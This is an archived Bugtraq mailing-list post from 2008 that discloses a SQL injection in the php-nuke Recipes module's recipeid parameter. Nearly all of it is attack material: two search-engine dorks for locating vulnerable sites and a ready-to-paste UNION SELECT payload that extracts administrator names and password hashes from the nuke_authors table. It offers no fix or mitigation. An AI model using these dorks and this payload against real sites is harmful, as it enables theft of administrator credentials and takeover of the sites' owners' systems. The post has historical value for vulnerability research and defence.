Bugtraq mailing list archives

php-nuke Recipes SQL Injection(recipeid)


From: hackturkiye.hackturkiye () gmail com
Date: 23 Feb 2008 13:32:06 -0000

###############################################################
# 
#   php-nuke Recipes SQL Injection(recipeid)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye () gmail com
#        
################################################################
# 
#  DORK 1 : allinurl:  "modules.php?name=Recipes"op=viewrecipe
# 
#  DORK 2 : allinurl:  "modules.php?name=Recipes"recipeid
#
################################################################
   EXPLOIT : after recipeid

-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################


Current thread: